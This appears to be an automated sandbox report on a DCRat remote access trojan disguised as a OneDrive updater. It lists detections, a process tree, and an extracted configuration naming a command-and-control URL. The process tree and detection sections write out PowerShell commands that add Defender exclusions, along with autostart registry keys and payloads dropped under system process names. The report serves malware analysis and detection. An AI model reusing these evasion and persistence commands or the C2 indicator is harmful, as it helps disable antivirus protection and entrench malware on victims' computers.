Edit tour

Windows Analysis Report
OneDriveStandaloneUpdater.exe

Overview

General Information

Sample name:	OneDriveStandaloneUpdater.exe
Analysis ID:	1589978
MD5:	c1f1bea182f1c3477c2f133c3ac26930
SHA1:	2145c09d2c3279ac83e844c4d80e7aa219e99b8d
SHA256:	1054af5e9206aa0cb650a4e58900bcd369a554e64eaa89f56cb35cd105386eb5
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DCRat

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files to the user root directory

Drops PE files with benign system names

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Process Parents

Sigma detected: System File Execution Location Anomaly

Sigma detected: Windows Binaries Write Suspicious Extensions

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: Use Short Name Path in Command Line

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

OneDriveStandaloneUpdater.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

csc.exe (PID: 5416 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 7280 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp" "c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 7460 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7468 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7496 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7536 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7576 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7612 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6688 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7964 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8116 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7308 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

MjlsqDcSPlv.exe (PID: 1268 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

csrss.exe (PID: 1840 cmdline: "C:\Users\All Users\Documents\csrss.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 4240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 820 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4236 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

csrss.exe (PID: 2760 cmdline: "C:\Users\All Users\Documents\csrss.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

MjlsqDcSPlv.exe (PID: 400 cmdline: "C:\Users\user\NetHood\MjlsqDcSPlv.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

OneDriveStandaloneUpdater.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

csrss.exe (PID: 2376 cmdline: "C:\Users\All Users\Documents\csrss.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7300 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 640 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

csrss.exe (PID: 4220 cmdline: "C:\Users\All Users\Documents\csrss.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 5648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5992 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7084 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

csrss.exe (PID: 7420 cmdline: "C:\Users\All Users\Documents\csrss.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 2824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MjlsqDcSPlv.exe (PID: 4332 cmdline: "C:\Users\user\NetHood\MjlsqDcSPlv.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 5144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4128 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4136 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

MjlsqDcSPlv.exe (PID: 6188 cmdline: "C:\Users\user\NetHood\MjlsqDcSPlv.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 6284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7668 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2156 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

OneDriveStandaloneUpdater.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe" MD5: C1F1BEA182F1C3477C2F133C3AC26930)

cmd.exe (PID: 5696 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2860 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2840 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://574565cm.renyash.top/LongpollserverFlowerasyncCdn", "MUTEX": "DCR_MUTEX-RZ2CPLiApiJRJuXbfSyz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
OneDriveStandaloneUpdater.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\Public\Documents\csrss.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1247733245.0000000000202000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: OneDriveStandaloneUpdater.exe PID: 5260	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.OneDriveStandaloneUpdater.exe.200000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\All Users\Documents\csrss.exe" , CommandLine: "C:\Users\All Users\Documents\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\csrss.exe, NewProcessName: C:\Users\Public\Documents\csrss.exe, OriginalFileName: C:\Users\Public\Documents\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\All Users\Documents\csrss.exe" , ProcessId: 1840, ProcessName: csrss.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ProcessId: 5260, TargetFilename: C:\Users\All Users\Documents\csrss.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\MjlsqDcSPlv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ProcessId: 5260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MjlsqDcSPlv

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\All Users\Documents\csrss.exe" , ParentImage: C:\Users\Public\Documents\csrss.exe, ParentProcessId: 1840, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", ProcessId: 4240, ProcessName: cmd.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe", ParentImage: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ParentProcessId: 5260, ParentProcessName: OneDriveStandaloneUpdater.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', ProcessId: 7460, ProcessName: powershell.exe

Sigma detected: Suspicious Process Parents

Source: Process started

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\All Users\Documents\csrss.exe" , CommandLine: "C:\Users\All Users\Documents\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\csrss.exe, NewProcessName: C:\Users\Public\Documents\csrss.exe, OriginalFileName: C:\Users\Public\Documents\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\All Users\Documents\csrss.exe" , ProcessId: 1840, ProcessName: csrss.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\Documents\csrss.exe, ProcessId: 1840, TargetFilename: C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\Documents\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ProcessId: 5260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\Documents\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ProcessId: 5260, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe", ParentImage: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ParentProcessId: 5260, ParentProcessName: OneDriveStandaloneUpdater.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", ProcessId: 5416, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\All Users\Documents\csrss.exe" , ParentImage: C:\Users\Public\Documents\csrss.exe, ParentProcessId: 1840, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" ", ProcessId: 4240, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 5416, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP", ProcessId: 6368, ProcessName: cvtres.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ProcessId: 5260, TargetFilename: C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe", ParentImage: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ParentProcessId: 5260, ParentProcessName: OneDriveStandaloneUpdater.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe', ProcessId: 7460, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\All Users\Documents\csrss.exe" , CommandLine: "C:\Users\All Users\Documents\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\csrss.exe, NewProcessName: C:\Users\Public\Documents\csrss.exe, OriginalFileName: C:\Users\Public\Documents\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\All Users\Documents\csrss.exe" , ProcessId: 1840, ProcessName: csrss.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe", ParentImage: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe, ParentProcessId: 5260, ParentProcessName: OneDriveStandaloneUpdater.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline", ProcessId: 5416, ProcessName: csc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: OneDriveStandaloneUpdater.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://574565cm.renyash.top	Avira URL Cloud: Label: malware
Source: http://574565cm.renyash.top/LongpollserverFlowerasyncCdn.php	Avira URL Cloud: Label: malware
Source: http://574565cm.renyash.top/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\Public\Documents\csrss.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: OneDriveStandaloneUpdater.exe

Malware Configuration Extractor: DCRat {"C2 url": "http://574565cm.renyash.top/LongpollserverFlowerasyncCdn", "MUTEX": "DCR_MUTEX-RZ2CPLiApiJRJuXbfSyz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	ReversingLabs: Detection: 76%
